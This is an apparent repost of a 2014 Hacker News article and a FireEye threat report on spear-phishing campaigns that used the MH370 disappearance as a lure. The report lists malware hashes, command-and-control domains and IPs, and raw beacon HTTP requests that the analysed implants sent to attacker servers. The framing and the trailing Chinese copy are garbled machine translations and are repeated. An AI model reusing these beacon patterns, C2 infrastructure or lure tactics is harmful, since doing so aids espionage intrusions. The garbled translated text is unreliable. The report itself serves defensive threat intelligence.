--BY---The Hacker News ---**Malaysia Flight MH370 tragedy abused Chinese hackers spy attacks !!-?? [Wednesday, March 26, 2014,,Editor" Wang Wei]] ---BY Hacker News---**馬來西亞航班MH370的悲劇被中國黑客間諜的攻擊濫用 ?!!?-[週三,2014年3月26日,, Editor"汪煒 ]]-
--BY 해커 뉴스---**말레이시아 항공 MH370 비극 학대 중국어 해커는 공격을 감시! - ?? [2014년 3월 26일 (수요일), 편집기 "왕 웨이]] -
--- TheHacker--par Nouvelles ---**Malaisie vol MH370 tragédie abusé de hackers chinois espionnent attaques !!-??[Wednesday, 26 Mars 2014,, Editor "Wang Wei]] -
--BYハッカーニュース---**マレーシア航空MH370の悲劇虐待を受け、中国のハッカーが攻撃をスパイ!! - ?? [2014年3月26日(水曜日)、エディタ"王偉]] -
--Durch The Hacker News --- ** Malaysia Flug MH370 Tragödie missbraucht Chinesische Hacker spionieren Angriffe !! - ?? [Mittwoch, 26. MÄRZ 2014, Editor "Wang Wei]] -
--BY The Hacker News --- ** Malajzio Flugo MH370 tragedio trouzita ĉina hackers spioni atakoj !! - ?? [Merkredo, marto 26, 2014,, Redaktoro "Wang Wei]] -
**USA/UK/SEAOUL KOREAN/TW/MACAU(FDZ)/HKS/FR/JP/UKN/DE/FA/POL/VI/ESP`/CO/ARG/PY/MEX/MO/AUST./RU/HO/MAL/NW/CA/IT/PH/Swedis/Mongolian/TUR/Arabic/Latin/INDON./Greek/Dansk/THAI/......All the world lauguage**-
*
-**Please use the god home use Google translator to translate
the language of your country or city Oh ^^-
-**請各位用家善用谷歌大神的翻譯器,來翻譯你們的國家或城市的語言喔^^-
-**국가 또는 도시 오 ^^의 언어를 번역하는the 하나님의 가정에서 사용하는 구글 번역기를 사용하십시오-
-**Se il vous plaît utiliser l'utilisation de la maison de Dieu
traducteur de Google pour traduire la langue de votre pays ou ville Oh ^^-
-**あなたの国や都市ああ^^の言語を翻訳するために神の家庭用のGoogle翻訳を使用してください -
-**Будь ласка, використовуйте бог домашнього використання
перекладач Google перевести мову вашої країни або міста Oh ^^-
-**Bitte benutzen Sie den Gott den Heimgebrauch Google
Übersetzer, um die Sprache Ihres Landes oder Stadt Oh ^^ übersetzen-
-**Käytäthe jumala kotikäyttöön Googlen kääntäjä kääntääthe
kieli maata tai kaupunkia Oh ^^-
-**Proszę używać korzystania bóg
startowej Google Translator przetłumaczyć język
kraju lub miasta Oh ^^-
-**Vui lòng sử dụng việc sử dụng thần chủ Google phiên dịch để dịch các ngôn ngữ của đất nước, thành phố của bạn Oh ^^-
-**Utilice el uso dios casa traductor de Google para traducir el
idioma de su país o ciudad Oh ^^-
-**Utere deo, domum usu translator Google Translate to the
language of patriae, civitatem O ^^-
-**Пожалуйста, используйте бог домашнего использования
переводчик Google перевести язык вашей страны или города Oh ^^ -
-**Gebruik de god thuisgebruik Google vertaler naar de taal van
uw land of stad Oh ^^ vertalen-
-**Sila gunakan digunakan di rumah tuhan penterjemah Google
untuk menterjemahkan bahasa negara atau bandar anda Oh ^^-
-**Bruk gud hjemmebruk Google oversetter til å oversette språket
i landet eller byen Oh ^^-
-**Si prega di utilizzare l'uso dio Home page di Google
traduttore per tradurre la lingua del proprio paese o città Oh ^^-
-**Mangyaring gamitin ang bahay diyos paggamit tagasalin ng
Google upang i-translate ang wika ng iyong bansa o lungsod Oh ^^-
-**Använd guden hemmabruk Google översättare att översätta
språket i ditt land eller stad Oh ^^-
-**الرجاء استخدام استخدام إله المنزل مترجم جوجل لترجمة لغة بلدك أو المدينة أوه ^^-
- **Utere deo, domum usu translator Google Translate to the
language of patriae, civitatem O ^^-
-**Silahkan gunakan penggunaan dewa rumah Google translator
untuk menerjemahkan bahasa negara atau kota Oh ^^-
-**Brug venligst gud hjemmebrug Google oversætter til at
oversætte sproget i dit land eller by Oh ^^-
-**Παρακαλώ χρησιμοποιήστε το θεό οικιακή χρήση του Google μεταφραστή να μεταφράσει τη γλώσσα της χώρας ή της πόλης σας Ω ^^-
-**กรุณาใช้theใช้งานที่บ้านพระเจ้าของ Google แปลที่จะแปลภาษาของประเทศหรือเมืองของคุณโอ้ ^^the-
-**Bonvolu uzi la dio hejmo uzo Google tradukisto por traduki la
lingvon de via lando aŭ urbo Ho ^^- **
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html
Malaysian flight MH370 tragedy abused by Chinese hackers for Espionage attacks
Wednesday, March 26, 2014 Editor: Wang Wei "
The Mysterious Malaysian Airlines flight MH370 , a Boeing 777-200 aircraft that has gone missing by the time it flew from Kuala Lumpur to Beijing. The Malaysian Prime Minister had also confirmed that the Malaysia Airlines plane had crashed in a remote part of the southern Indian Ocean.
Cyber Criminals are known to take advantage of major news stories or events where there is a high level of public interest and now Scammers are also targeting tragedy of MH370 to trap innocent Internet users.
Just a few days before we warned you about a Facebook malware campaign claimed that the missing Malaysian Airlines ' MH370 has been spotted in the Bermuda Triangle ' ---
http://thehackernews.com/2014/03/beware-of-new-facebook-malware-claims.html&usg=ALkJrhi4f__dZWJpF4rjbKi8XaViZROucQ
with its passengers still alive and invites users to click a link to view breaking news video footage.
This week, Security researchers at FireEye have revealed about various ongoing spear phishing and malware attacks by some advanced persistent threat (APT) attackers.
According to the researchers, the Chinese hacking group called ' admin@338 ', specialized in cyber espionage attacks had sent multiple MH370-themed spear phishing emails to the government officials in Asia-Pacific, with an attachment referring to the missing Malaysian flight MH370.
The attachment file was actually merged with Poison Ivy RAT (remote access tool) and WinHTTPHelper malware to hijack the computer systems of government officials.
The Chinese Hacking Group also initiated another attack against the US based think tank on 14th March. A malicious attachment was dropped via spear phishing mails, contains “ Malaysian Airlines MH370 5m Video.exe ”. The malicious attachment pretended to be a Flash video related to the missing plane and attached a 'Flash' icon to the executable file.
" In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. " researchers said.
More technical details and various attacks are explained on Fireeye blog . If you receive an email or any message on social media websites claiming to have information or news on Malaysian Airlines Flight MH370 do not click on any links or attachments.
The Mysterious Malaysian Airlines flight MH370 , a Boeing 777-200 aircraft that has gone missing by the time it flew from Kuala Lumpur to Beijing.
The Malaysian Prime Minister had also confirmed that the Malaysia
Airlines plane had crashed in a remote part of the southern Indian
Ocean.
Cyber Criminals are known to take advantage of major news stories or
events where there is a high level of public interest and now Scammers
are also targeting tragedy of MH370 to trap innocent Internet users.
Just a few days before we warned you about a Facebook malware campaign claimed that the missing Malaysian Airlines ' MH370 has been spotted in the Bermuda Triangle ' with its passengers still alive and invites users to click a link to view breaking news video footage.
This week, Security researchers at FireEye have revealed about various ongoing spear phishing and malware attacks by some advanced persistent threat (APT) attackers.
According to the researchers, the Chinese hacking group called ' admin@338 ', specialized in cyber espionage attacks had sent multiple MH370-themed spear phishing emails to the government officials in Asia-Pacific, with an attachment referring to the missing Malaysian flight MH370.
The attachment file was actually merged with Poison Ivy RAT (remote access tool) and WinHTTPHelper malware to hijack the computer systems of government officials.
The Chinese Hacking Group also initiated another attack against the US based think tank on 14th March. A malicious attachment was dropped via spear phishing mails, contains “ Malaysian Airlines MH370 5m Video.exe ”. The malicious attachment pretended to be a Flash video related to the missing plane and attached a 'Flash' icon to the executable file.
" In
addition to the above activity attributed to the Admin@338 group, a
number of other malicious documents abusing the missing Flight 370 story
were also seen in the wild. " researchers said.
More technical details and various attacks are explained on Fireeye blog .
If you receive an email or any message on social media websites
claiming to have information or news on Malaysian Airlines Flight MH370
do not click on any links or attachments.
Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370
March 24, 2014 | | Advanced Malware , Targeted Attack , Threat Intelligence , Threat Research
While many advanced persistent threat (APT) groups have increasingly
embraced strategic Web compromise as a malware delivery vector, groups
also continue to rely on spear-phishing emails that leverage popular
news stories. The recent tragic disappearance of flight MH 370 is no exception.
This post will examine multiple instances from different threat groups,
all using spear-phishing messages and leveraging the disappearance of
Flight 370 as a lure to convince the target to open a malicious
attachment.
“Admin@338” Targets an APAC Government and US Think Tank
The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.
The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group's activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:
A second targeted attack attributed to the same Admin@338 group was
sent to a prominent US-based think tank on March 14, 2014. This spear
phish contained an attachment that dropped “Malaysian Airlines MH370 5m
Video.exe” (MD5: b869dc959daac3458b6a81bc006e5b97). The malware sample was crafted to appear as though it was a Flash video, by binding a Flash icon to the malicious executable.
Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn't exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper . The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks .
This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:
The www.dpmc.dynssl[.]com domain resolved to following IPs:
Note that the www.verizon.proxydns[.]com domain used by the Poison Ivy
discussed above also resolved to both 58.64.153.157 and 59.188.0.197
during the same time frame as the Backdoor.APT.WinHTTPHelper command and
control (CnC) located at dpmc.dynssl[.]com and www.dpmc.dynssl[.]com.
In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.
The Naikon Lures
On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe“ (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.
It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:
This malware leverages “pdfbind” to add a PDF into itself, as can be
seen in the debugging strings, and when launched, the malware also
presents a decoy document to the target:
The Plat1 Lures
On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to 59.188.253.216 via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:
The Mongall/Saker Lures
Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:
The “Tranchulas” Lures
On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by Pakistan.zip” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on 199.91.173.43. This IP address was previously used to host malicious files.
The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to 199.91.173.45. This IP address was previously used to host a file entitled “obl_leaked_report.zip” (MD5: a4c7c79308139a7ee70aacf68bba814f).
The initial beacon to the command-and-control server is as follows:
The Page Campaign
A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 – FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to 122.10.89.85 on both port 80 and 443. The initial beacon traffic over port 80 is as follows:
While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.
Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.
http://thehackernews.com/2014/03/malaysian-flight-mh370-tragedy-abused.html“Admin@338” Targets an APAC Government and US Think Tank
The first spear phish from group “Admin@338” was sent to a foreign government in the Asian Pacific region on March 10, 2014 – just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, “Malaysian Airlines MH370.doc” (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of “decoy content” upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.
The attachment dropped a Poison Ivy variant into the path C:\DOCUME~1\admin\LOCALS~1\Temp\kav.exe (MD5: 9dbe491b7d614251e75fb19e8b1b0d0d), which, in turn, beaconed outbound to www.verizon.proxydns[.]com. This Poison Ivy variant was configured with the connection password “wwwst@Admin.” The APT group we refer to as Admin@338 has previously used Poison Ivy implants with this same password. We document the Admin@338 group's activities in our Poison Ivy: Assessing Damage and Extracting Intelligence paper. Further, the domain www.verizon.proxydns[.]com previously resolved to the following IP addresses that have also been used by the Admin@338 group:
| IP Address | First Seen | Last Seen |
| 103.31.241.110 | 2013-08-27 | 2013-08-28 |
| 174.139.242.19 | 2013-08-28 | 2013-08-31 |
| 58.64.153.157 | 2013-09-03 | 2014-03-07 |
| 59.188.0.197 | 2014-03-07 | 2014-03-19 |
Interestingly, in this case, the malware sets its persistence in the normal “Run” registry location, but it tries to auto start the payload from the disk directory “c:\programdata”, which doesn't exist until Windows 7, so a simple reboot would mitigate this threat on Windows XP. This suggests the threat actors did not perform quality control on the malware or were simply careless. We detect this implant as Backdoor.APT.WinHTTPHelper . The Admin@338 group discussed above has used variants of this same malware family in previous targeted attacks .
This specific implant beacons out to dpmc.dynssl[.]com:443 and www.dpmc.dynssl[.]com:80. The domain dpmc.dynssl[.]com resolved to the following IPs:
| IP Address | First Seen | Last Seen |
| 31.193.133.101 | 2013-11-01 | 2013-11-29 |
| 58.64.153.157 | 2014-01-10 | 2014-03-08 |
| 59.188.0.197 | 2014-03-14 | 2014-03-17 |
| 139.191.142.168 | 2014-03-17 | 2014-03-19 |
| IP Address | First Seen | Last Seen |
| 31.193.133.101 | 2013-10-30 | 2013-11-29 |
| 58.64.153.157 | 2014-01-10 | 2014-03-08 |
| 59.188.0.197 | 2014-03-14 | 2014-03-18 |
| 139.191.142.168 | 2014-03-17 | 2014-03-19 |
In addition to the above activity attributed to the Admin@338 group, a number of other malicious documents abusing the missing Flight 370 story were also seen in the wild. Other threat groups likely sent these other documents.
The Naikon Lures
On March 9, 2014, a malicious executable entitled the “Search for MH370 continues as report says FBI agents on way to offer assistance.pdf .exe“ (MD5: 52408bffd295b3e69e983be9bdcdd6aa) was seen circulating in the wild. This sample beacons to the CnC net.googlereader[.]pw:443. We have identified this sample, via forensic analysis, as Backdoor.APT.Naikon.
It uses a standard technique of changing its icon to make it appear to be a PDF, in order to lend to its credibility. This same icon, embedded as a PE Resource, has been used in the following recent samples:
| MD5 | Import hash | CnC Server |
| fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | ecoh.oicp[.]net |
| 018f762da9b51d7557062548d2b91eeb | e30e07abf1633e10c2d1fbf34e9333d6 | orayjue.eicp[.]net |
| fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | ecoh.oicp[.]net:443 |
| 498aaf6df71211f9fcb8f182a71fc1f0 | a692dca39e952b61501a278ebafab97f | xl.findmy[.]pw |
| a093440e75ff4fef256f5a9c1106069a | a692dca39e952b61501a278ebafab97f | xl.findmy[.]pw |
| 125dbbb742399ec2c39957920867ee60 | a692dca39e952b61501a278ebafab97f | uu.yahoomail[.]pw |
| 52408bffd295b3e69e983be9bdcdd6aa | a692dca39e952b61501a278ebafab97f | net.googlereader[.]pw |
The Plat1 Lures
On March 10, 2014, we observed another sample that exploited CVE-2012-0158, titled “MH370班机可以人员身份信息.doc” (MD5: 4ff2156c74e0a36d16fa4aea29f38ff8), which roughly translates to “MH370 Flight Personnel Identity Information”. The malware that is dropped by the malicious Word document, which we detect as Trojan.APT.Plat1, begins to beacon to 59.188.253.216 via TCP over port 80. The decoy document opened after exploitation is blank. The malicious document dropped the following implants:
C:\Documents and Settings\Administrator\Application Data\Intel\ResN32.dll (MD5: 2437f6c333cf61db53b596d192cafe64)The implants dropped by this malicious document both included unique PDB paths that can be used to find related samples. These paths were as follows:
C:\Documents and Settings\Administrator\Application Data\Intel\~y.dll (MD5: d8540b23e52892c6009fdd5812e9c597)
E:\Work\T5000\T5 Install\ResN\Release\ResN32.pdbThis malware family was also described in more detail here .
F:\WORK\PROJECT\T5 Install\InstDll\Release\InstDll.pdb
The Mongall/Saker Lures
Another sample leveraging the missing airliner theme was seen on March 12, 2014. The malicious document exploited CVE-2012-0158 and was titled, “Missing Malaysia Airlines Flight 370.doc” (MD5: 467478fa0670fa8576b21d860c1523c6). Although the extension looked like a Microsoft Office .DOC file, it was actually an .HTML Application (HTA) file. Once the exploit is successful, the payload makes itself persistent by adding a Windows shortcut (.LNK) file pointing to the malware in the “Startup” folder in the start menu. It beacons outbound to comer4s.minidns[.]net:8070. The network callback pattern, shown below, is known by researchers as “Mongall” or “Saker”:
GET /3010FC080[REDACTED] HTTP/1.1The sample also drops a decoy file called “aa.doc” into the temp folder and displays the decoy content shown below:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
Host: comer4s.minidns.net:8070
Cache-Control: no-cache
The “Tranchulas” Lures
On March 18, 2014 a sample entitled “Malysia Airline MH370 hijacked by Pakistan.zip” was sent as a ZIP file (MD5: 7dff5c4ae1b1fea7ecbf7ab787da3468) that contained a Windows screensaver file disguised as a PDF (MD5: b03edbb264aa0c980ab2974652688876). The ZIP file was hosted on 199.91.173.43. This IP address was previously used to host malicious files.
The screen saver file drops “winservice.exe” (MD5: 828d4a66487d25b413cb19ef8ee7c783) which begins beaconing to 199.91.173.45. This IP address was previously used to host a file entitled “obl_leaked_report.zip” (MD5: a4c7c79308139a7ee70aacf68bba814f).
The initial beacon to the command-and-control server is as follows:
POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP/1.1This same control server was used in previous activity .
Host: 199.91.173.45
Accept: */*
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
The Page Campaign
A final malicious document was seen abusing the missing Flight 370 story on March 18, 2014. This document exploited CVE-2012-0158 and was entitled “MH370 PM statement 15.03.14 – FINAL.DOC” (MD5: 5e8d64185737f835318489fda46f31a6). This document dropped a Backdoor.APT.Page implant and connected to 122.10.89.85 on both port 80 and 443. The initial beacon traffic over port 80 is as follows:
GET /18110143/page_32180701.html HTTP/1.1Conclusion
Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: 122.10.89.85
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
While many APT actors have adopted strategic Web compromise as a delivery vector, it is apparent that spear phishing via email-based attachments or links to zip files remain popular with many threat actors, especially when paired with lures discussing current media events. Network defenders should incorporate these facts into their user training programs and be on heightened alert for regular spear-phishing campaigns, which leverage topics dominating the news cycle.
Acknowledgement: We thank Nart Villeneuve and Patrick Olsen for their support, research, and analysis on these findings.
================
魚叉式網絡釣魚消息循環:APT演員槓桿興趣馬來西亞航班MH 370的消失
雖然許多高級持續性威脅(APT)集團日益接受網絡戰略妥協的惡意軟件傳遞載體,集團也繼續依靠魚叉式網絡釣魚電子郵件,利用流行的新聞故事。 中航MH 370最近的悲慘消失也不例外。 這篇文章將探討來自不同團體的威脅的多個實例,全部採用魚叉式網絡釣魚郵件,並利用飛行370消失的誘惑說服目標打開惡意附件。
“管理@ 338”目標的亞太地區政府和美國智庫
從組“管理@ 338”的第一個矛釣魚被送到外國政府在亞太地區對2014年3月10日 - 短短兩天後,飛行消失。 威脅者發出矛釣魚電子郵件,標題為附件,“馬來西亞航空MH370.doc”(MD5:9c43a26fe4538a373b7f5921055ddeae)。 雖然威脅行為者通常包括某種形式的“引誘物含量”在成功的開發(即,表示什麼收件人有望打開一個文件),在這種情況下,用戶僅示出一個空白文檔。
附 件下降了毒藤變到路徑C:\ DOCUME〜1 \ ADMIN \ LOCALS〜1 \ TEMP \ kav.exe(MD5:9dbe491b7d614251e75fb19e8b1b0d0d)[],這反過來,beaconed出境到 www.verizon.proxydns COM。 這種毒藤變種配置了連接密碼“wwwst @聯繫。”該APT組,我們稱之為管理@ 338以前使用毒藤種植與此相同的密碼。 我們記錄下管理員@ 338組的活動在我們的毒藤:評估損害和智能提取文件。 另外,域www.verizon.proxydns玉米先前解析為也已用於由管理員@ 338組下面的IP地址[。]:
第二個有針對性的攻擊歸因於同一管理@ 338組被送到了美國一家著名的智囊團3月14日,2014年這一矛釣魚包含的附件降至“馬來西亞航空MH3705米Video.exe”(MD5:b869dc959daac3458b6a81bc006e5b97) 。 該惡意軟件樣本製作的出現,彷彿這是一個Flash視頻,通過結合一個Flash圖標的惡意可執行文件。
有趣的是,在這種情況下,惡意軟件設置其在正常的“運行”註冊表位置的持久性,但它會嘗試自動開始從磁盤目錄的“C:\ programdata”有效負載,不存在直到Windows 7,所以簡單的重啟將減輕對Windows XP的這一威脅。 這表明威脅行為並沒有對惡意軟件進行質量控制,或者只是不小心。 我們檢測到這種植入物的Backdoor.APT.WinHTTPHelper。 管理員@上面所討論的338組採用了同樣的惡意軟件家族的變種在以前的有針對性的攻擊 。
這種特殊的植入物標出來dpmc.dynssl COM [。] [。] 443 www.dpmc.dynssl COM:80。 該域名dpmc.dynssl COM解析為IP地址如下[。]:
該www.dpmc.dynssl COM域名解析為IP地址如下[。]:
需
要注意的是上面還解決了這兩個58.64.153.157和59.188.0.197,同時幀作為Backdoor.APT.WinHTTPHelper
指揮和控制(CNC)在位於所用的毒藤的www.verizon.proxydns [。] COM域名討論在dpmc.dynssl
[。]玉米和www.dpmc.dynssl [。]玉米。
除了歸因於管理員@ 338組以上的活性,其他一些惡意文件濫用失踪航班370故事中也見到野外。 其他威脅的群體有可能發送這些文檔。
該Naikon誘劑
於2014年3月9日,一個惡意的可執行文件名為“搜索MH370繼續擔任報告說,在途中聯邦調查局特工提供assistance.pdf .EXE”(MD5:52408bffd295b3e69e983be9bdcdd6aa)被視為循環在野外。 此示例向信標數控net.googlereader私服[。]:443。 我們已經確定了這個樣本,經法醫分析,Backdoor.APT.Naikon。
它採用改變其圖標,使其看起來是PDF文件,以借其信譽的標準技術。 此相同的圖標,嵌入作為PE資源,已使用了下面的最近樣本中:
這種惡意軟件利用“pdfbind”來將PDF添加到自身,可以看出,在調試的字符串,並在啟動時,該惡意軟件還提供了一個誘餌文件到目標:
該Plat1誘劑
於2014年3月10日,我們觀察到的另一個示例,利用CVE-2012-0158,名為“MH370班機可以人員身份信息的.doc”(MD5:4ff2156c74e0a36d16fa4aea29f38ff8),這大致可以翻譯為“MH370飛行人員的身份信息”。 這是由惡意的Word文檔,我們發現作為Trojan.APT.Plat1下降了惡意軟件,開始通過TCP通過端口80打開後的剝削是空白的誘餌文件航標59.188.253.216。 該惡意文檔下降以下植入物:
該Mongall /獵魚餌
另一個樣品借力失踪客機的主題就已經出現在3月12日,2014年惡意文件利用CVE-2012-0158和題為“缺少馬來西亞航空公司航班370.doc”(MD5:467478fa0670fa8576b21d860c1523c6)。 雖然延看起來像一個Microsoft Office .doc文件,它實際上是一個.html應用程序(HTA)的文件。 一旦攻擊成功,有效載荷使自己持續增加一個Windows快捷方式(.LNK)文件指向在開始菜單的“啟動”文件夾中的惡意軟件。 據信標出境到comer4s.minidns網[。]:8070。 網絡回調模式,如下圖所示,已知由研究者為“Mongall”或“獵”:
在“Tranchulas”魚餌
於 2014年3月18日題為“Malysia航空公司MH370由Pakistan.zip劫持”的樣品被送到一個ZIP文件 (MD5:7dff5c4ae1b1fea7ecbf7ab787da3468)包含偽裝成PDF文件在Windows屏幕保護程序文件 (MD5:b03edbb264aa0c980ab2974652688876)。 ZIP文件託管於199.91.173.43。 這個IP地址是以前使用託管惡意文件。
屏幕保護程序文件放置“winservice.exe”(MD5:828d4a66487d25b413cb19ef8ee7c783)的信標開始向199.91.173.45。 這個IP地址是以前用來舉辦了題為“obl_leaked_report.zip”文件(MD5:a4c7c79308139a7ee70aacf68bba814f)。
最初的燈塔對命令和控制服務器如下:
該活動頁面
最後一個惡意文件被視為濫用失踪370航班的故事3月18日,2014年本文件利用CVE-2012-0158和題為“MH370 PM聲明14年3月15日 - FINAL.DOC”(MD5:5e8d64185737f835318489fda46f31a6)。 本文下降了Backdoor.APT.Page植入物,並連接到122.10.89.85這兩個端口80和443端口80的初始航標交通為如下操作:
雖然許多APT者們採取了戰略性的Web妥協作為傳遞載體,很明顯,矛,通過基於電子郵件的附件或鏈接釣魚zip文件仍然深受許多威脅的行為,尤其是在與誘惑討論當前的媒體活動配對。 網絡維護者應當將這些事實變成他們的用戶培訓計劃,並提高警戒定期矛釣魚運動,它利用主題佔據了消息循環。
致謝:我們感謝納爾特維倫紐夫和帕特里克·奧爾森的支持,研究和分析,這些研究結果。
“管理@ 338”目標的亞太地區政府和美國智庫
從組“管理@ 338”的第一個矛釣魚被送到外國政府在亞太地區對2014年3月10日 - 短短兩天後,飛行消失。 威脅者發出矛釣魚電子郵件,標題為附件,“馬來西亞航空MH370.doc”(MD5:9c43a26fe4538a373b7f5921055ddeae)。 雖然威脅行為者通常包括某種形式的“引誘物含量”在成功的開發(即,表示什麼收件人有望打開一個文件),在這種情況下,用戶僅示出一個空白文檔。
附 件下降了毒藤變到路徑C:\ DOCUME〜1 \ ADMIN \ LOCALS〜1 \ TEMP \ kav.exe(MD5:9dbe491b7d614251e75fb19e8b1b0d0d)[],這反過來,beaconed出境到 www.verizon.proxydns COM。 這種毒藤變種配置了連接密碼“wwwst @聯繫。”該APT組,我們稱之為管理@ 338以前使用毒藤種植與此相同的密碼。 我們記錄下管理員@ 338組的活動在我們的毒藤:評估損害和智能提取文件。 另外,域www.verizon.proxydns玉米先前解析為也已用於由管理員@ 338組下面的IP地址[。]:
| IP地址 | 第一次看到 | 最後一次露面 |
| 103.31.241.110 | 2013年8月27日 | 2013年8月28日 |
| 174.139.242.19 | 2013年8月28日 | 2013年8月31日 |
| 58.64.153.157 | 2013年9月3日 | 2014年3月7日 |
| 59.188.0.197 | 2014年3月7日 | 2014年3月19日 |
有趣的是,在這種情況下,惡意軟件設置其在正常的“運行”註冊表位置的持久性,但它會嘗試自動開始從磁盤目錄的“C:\ programdata”有效負載,不存在直到Windows 7,所以簡單的重啟將減輕對Windows XP的這一威脅。 這表明威脅行為並沒有對惡意軟件進行質量控制,或者只是不小心。 我們檢測到這種植入物的Backdoor.APT.WinHTTPHelper。 管理員@上面所討論的338組採用了同樣的惡意軟件家族的變種在以前的有針對性的攻擊 。
這種特殊的植入物標出來dpmc.dynssl COM [。] [。] 443 www.dpmc.dynssl COM:80。 該域名dpmc.dynssl COM解析為IP地址如下[。]:
| IP地址 | 第一次看到 | 最後一次露面 |
| 31.193.133.101 | 二○一三年十一月一號 | 2013年11月29日 |
| 58.64.153.157 | 二零一四年一月十日 | 2014年3月8日 |
| 59.188.0.197 | 2014年3月14日 | 2014年3月17日 |
| 139.191.142.168 | 2014年3月17日 | 2014年3月19日 |
| IP地址 | 第一次看到 | 最後一次露面 |
| 31.193.133.101 | 2013年10月30日 | 2013年11月29日 |
| 58.64.153.157 | 二零一四年一月十日 | 2014年3月8日 |
| 59.188.0.197 | 2014年3月14日 | 2014年3月18日 |
| 139.191.142.168 | 2014年3月17日 | 2014年3月19日 |
除了歸因於管理員@ 338組以上的活性,其他一些惡意文件濫用失踪航班370故事中也見到野外。 其他威脅的群體有可能發送這些文檔。
該Naikon誘劑
於2014年3月9日,一個惡意的可執行文件名為“搜索MH370繼續擔任報告說,在途中聯邦調查局特工提供assistance.pdf .EXE”(MD5:52408bffd295b3e69e983be9bdcdd6aa)被視為循環在野外。 此示例向信標數控net.googlereader私服[。]:443。 我們已經確定了這個樣本,經法醫分析,Backdoor.APT.Naikon。
它採用改變其圖標,使其看起來是PDF文件,以借其信譽的標準技術。 此相同的圖標,嵌入作為PE資源,已使用了下面的最近樣本中:
| MD5 | 進口哈希 | 數控服務器 |
| fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | ecoh.oicp [。]淨 |
| 018f762da9b51d7557062548d2b91eeb | e30e07abf1633e10c2d1fbf34e9333d6 | orayjue.eicp [。]淨 |
| fcc59add998760b76f009b1fdfacf840 | e30e07abf1633e10c2d1fbf34e9333d6 | [] ecoh.oicp網:443 |
| 498aaf6df71211f9fcb8f182a71fc1f0 | a692dca39e952b61501a278ebafab97f | xl.findmy [。] PW |
